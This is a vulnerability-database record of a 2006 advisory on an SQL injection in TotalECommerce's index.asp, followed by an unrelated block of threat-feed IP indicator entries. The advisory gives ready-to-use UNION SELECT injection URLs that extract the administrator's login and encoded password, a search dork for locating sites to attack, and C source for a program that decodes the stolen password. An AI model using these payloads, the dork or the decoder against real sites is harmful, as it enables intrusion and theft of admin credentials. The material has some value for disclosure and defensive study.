{"id": "SECURITYVULNS:DOC:11701", "bulletinFamily": "software", "title": "Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.", "description": "--Security Report--\r\nAdvisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.\r\n---\r\nAuthor: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI\r\n---\r\nDate: 04/03/06 04:36 AM\r\n---\r\nContacts:{\r\nICQ: 10072\r\nMSN/Email: nukedx@nukedx.com\r\nWeb: http://www.nukedx.com\r\n}\r\n---\r\nVendor: TotalECommerce (http://www.totalecommerce.com)\r\nVersion: 1.0 and prior version must be affected.\r\nAbout: Via this method remote attacker can inject arbitrary SQL queries to id\r\nparameter\r\nin index.asp\r\nLevel: Critical\r\n---\r\nHow&Example:\r\nGET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]\r\nEXAMPLE 1 ->\r\nhttp://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,\r\nsenha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,\r\nsenha,senha,senha,senha,senha,senha,senha+from+administradores\r\nEXAMPLE 2 ->\r\nhttp://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,\r\nlogin,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,\r\nlogin,login,login,login,login,login,login+from+administradores\r\nwith example 1 remote attacker can get admin's encrypted password and with\r\nexample 2 remote attacker can get admin's login name\r\n[PageID]: must be working page id you can get some from frontpage.\r\n---\r\nTimeline:\r\n* 04/03/2006: Vulnerability found.\r\n* 04/03/2006: Could not contact with vendor.\r\n* 04/03/2006: File closed.\r\n---\r\nExploit&Decrypter:\r\nhttp://www.nukedx.com/?getxpl=18\r\n---\r\nDorks: intext:"totalecommerce"\r\n---\r\nOriginal advisory: http://www.nukedx.com/?getxpl=18\r\n\r\n---\r\nDecrypter source in C\r\n---\r\n/*********************************************\r\n* TotalECommerce PWD Decrypter *\r\n* Coded by |SaMaN| for nukedx *\r\n* http://www.k9world.org *\r\n* IRC.K9World.Org *\r\n*Advisory: http://www.nukedx.com/?viewdoc=18 *\r\n**********************************************/\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\nint main()\r\n{\r\n char buf[255];\r\n char buf2[255];\r\n char buf3[255];\r\n char *texto;\r\n char *vcrypt;\r\n int i,x,z,t = 0;\r\n char saman;\r\n texto = buf;\r\n vcrypt = buf2;\r\n printf("%s", "|=------------------------------------=|\n");\r\n printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");\r\n printf("%s", "|=------------------------------------=|\n\n");\r\n printf("%s", "Enter crypted password: ");\r\n scanf("%200s", buf);\r\n if (!texto)\r\n vcrypt = "";\r\n\r\n for (i = 0; i < strlen(texto); i++)\r\n {\r\n if ((vcrypt == "") || (i > strlen(texto)))\r\n x = 1;\r\n else\r\n x = x + 1;\r\n t = buf[i];\r\n z = 255 - t;\r\n saman = toascii(z);\r\n snprintf(buf3, 250, "%c", saman);\r\n strncat(buf2, buf3, 250);\r\n }\r\n printf("Result: %s\n", buf2);\r\n return;\r\n}\r\n---End of code---\r\nGreets to: |SaMaN|\r\n", "published": "2006-03-05T00:00:00", "modified": "2006-03-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11701", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:16", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 3.6, "vector": "NONE", "modified": "2018-08-31T11:10:16", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB3023167", "KB2880833", "KB953334", "KB2874216", "KB3209587", "KB981401", "KB2788321", "KB2510690", "KB2785908", "KB955430"]}, {"type": "threatpost", "idList": ["THREATPOST:F3563336B135A1D7C1251AE54FDC6286"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2164.NASL", "FREEBSD_PKG_D887B3D9736611EAB81A001CC0382B2F.NASL", "FREEBSD_PKG_090763F6703011EA93DD080027846A02.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892164"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2164-1:52F3C"]}, {"type": "freebsd", "idList": ["D887B3D9-7366-11EA-B81A-001CC0382B2F"]}, {"type": "zdt", "idList": ["1337DAY-ID-34154", "1337DAY-ID-34158", "1337DAY-ID-34157"]}], "modified": "2018-08-31T11:10:16", "rev": 2}, "vulnersScore": 3.6}, "affectedSoftware": []}

{"rst": [{"lastseen": "2021-03-03T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **46[.]209.28.50** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **22**.\n First seen: 2021-01-17T03:00:00, Last seen: 2021-03-03T03:00:00.\n IOC tags: **generic**.\nASN 42337: (First IP 46.209.22.0, Last IP 46.209.31.255).\nASN Name \"RESPINAAS\" and Organisation \"\".\nASN hosts 11701 domains.\nGEO IP information: City \"\", Country \"Iran\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-17T00:00:00", "id": "RST:D8B17266-7602-3FD1-A29D-F99CB2CDCACB", "href": "", "published": "2021-03-04T00:00:00", "title": "RST Threat feed. IOC: 46.209.28.50", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-03T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **46[.]209.130.50** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **21**.\n First seen: 2021-01-02T03:00:00, Last seen: 2021-03-03T03:00:00.\n IOC tags: **generic**.\nASN 42337: (First IP 46.209.123.0, Last IP 46.209.131.255).\nASN Name \"RESPINAAS\" and Organisation \"\".\nASN hosts 11701 domains.\nGEO IP information: City \"\", Country \"Iran\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-02T00:00:00", "id": "RST:BF48C859-4137-347B-8260-7BADE4756F7A", "href": "", "published": "2021-03-04T00:00:00", "title": "RST Threat feed. IOC: 46.209.130.50", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-03T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **46[.]209.141.118** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **52**.\n First seen: 2021-03-02T03:00:00, Last seen: 2021-03-03T03:00:00.\n IOC tags: **scan, generic**.\nASN 42337: (First IP 46.209.135.0, Last IP 46.209.141.255).\nASN Name \"RESPINAAS\" and Organisation \"\".\nASN hosts 11701 domains.\nGEO IP information: City \"\", Country \"Iran\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-03-02T00:00:00", "id": "RST:6EAB6F73-CF26-3289-AF61-FF221D21802C", "href": "", "published": "2021-03-04T00:00:00", "title": "RST Threat feed. IOC: 46.209.141.118", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-03T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **46[.]209.196.146** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **13**.\n First seen: 2020-12-26T03:00:00, Last seen: 2021-03-03T03:00:00.\n IOC tags: **generic**.\nASN 42337: (First IP 46.209.188.0, Last IP 46.209.198.255).\nASN Name \"RESPINAAS\" and Organisation \"\".\nASN hosts 11701 domains.\nGEO IP information: City \"\", Country \"Iran\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-26T00:00:00", "id": "RST:AE05D162-596D-309D-ACA3-12DE1916FDCD", "href": "", "published": "2021-03-04T00:00:00", "title": "RST Threat feed. IOC: 46.209.196.146", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-03T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **46[.]209.209.74** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **1**.\n First seen: 2019-10-08T03:00:00, Last seen: 2021-03-03T03:00:00.\n IOC tags: **generic**.\nASN 42337: (First IP 46.209.207.0, Last IP 46.209.213.255).\nASN Name \"RESPINAAS\" and Organisation \"\".\nASN hosts 11701 domains.\nGEO IP information: City \"\", Country \"Iran\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-10-08T00:00:00", "id": "RST:C682690C-BE0A-3504-B4B9-3468A2325794", "href": "", "published": "2021-03-04T00:00:00", "title": "RST Threat feed. IOC: 46.209.209.74", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-03T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **46[.]209.229.2** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **30**.\n First seen: 2021-02-09T03:00:00, Last seen: 2021-03-03T03:00:00.\n IOC tags: **generic**.\nASN 42337: (First IP 46.209.228.0, Last IP 46.209.229.255).\nASN Name \"RESPINAAS\" and Organisation \"\".\nASN hosts 11701 domains.\nGEO IP information: City \"\", Country \"Iran\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-09T00:00:00", "id": "RST:D85A0F69-BB62-3BE6-8969-E3F06322DD20", "href": "", "published": "2021-03-04T00:00:00", "title": "RST Threat feed. IOC: 46.209.229.2", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-03T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **46[.]209.236.18** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **7**.\n First seen: 2020-09-17T03:00:00, Last seen: 2021-03-03T03:00:00.\n IOC tags: **generic**.\nASN 42337: (First IP 46.209.236.0, Last IP 46.209.236.255).\nASN Name \"RESPINAAS\" and Organisation \"\".\nASN hosts 11701 domains.\nGEO IP information: City \"\", Country \"Iran\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-09-17T00:00:00", "id": "RST:18184168-0177-3021-893C-FECED0790224", "href": "", "published": "2021-03-04T00:00:00", "title": "RST Threat feed. IOC: 46.209.236.18", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-03T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **46[.]209.251.130** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **12**.\n First seen: 2020-11-21T03:00:00, Last seen: 2021-03-03T03:00:00.\n IOC tags: **generic**.\nASN 42337: (First IP 46.209.251.0, Last IP 46.209.255.255).\nASN Name \"RESPINAAS\" and Organisation \"\".\nASN hosts 11701 domains.\nGEO IP information: City \"\", Country \"Iran\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-11-21T00:00:00", "id": "RST:87D4FB9A-22DC-3DE5-AEDD-BD2FCA99027F", "href": "", "published": "2021-03-04T00:00:00", "title": "RST Threat feed. IOC: 46.209.251.130", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-03T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **5[.]160.179.189** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-02-20T03:00:00, Last seen: 2021-03-03T03:00:00.\n IOC tags: **scan, generic**.\nASN 42337: (First IP 5.160.166.0, Last IP 5.160.179.255).\nASN Name \"RESPINAAS\" and Organisation \"\".\nASN hosts 11701 domains.\nGEO IP information: City \"\", Country \"Iran\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-20T00:00:00", "id": "RST:ABC537F3-B1D8-39EF-8EAB-CBED01B10C3B", "href": "", "published": "2021-03-04T00:00:00", "title": "RST Threat feed. IOC: 5.160.179.189", "type": "rst", "cvss": {}}, {"lastseen": "2021-03-03T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **5[.]160.232.88** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **44**.\n First seen: 2021-03-03T03:00:00, Last seen: 2021-03-03T03:00:00.\n IOC tags: **generic**.\nASN 42337: (First IP 5.160.230.0, Last IP 5.160.239.255).\nASN Name \"RESPINAAS\" and Organisation \"\".\nASN hosts 11701 domains.\nGEO IP information: City \"Tehran\", Country \"Iran\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-03-03T00:00:00", "id": "RST:F37DB1AC-E07D-3AA1-B718-A2D9486FAD53", "href": "", "published": "2021-03-04T00:00:00", "title": "RST Threat feed. IOC: 5.160.232.88", "type": "rst", "cvss": {}}]}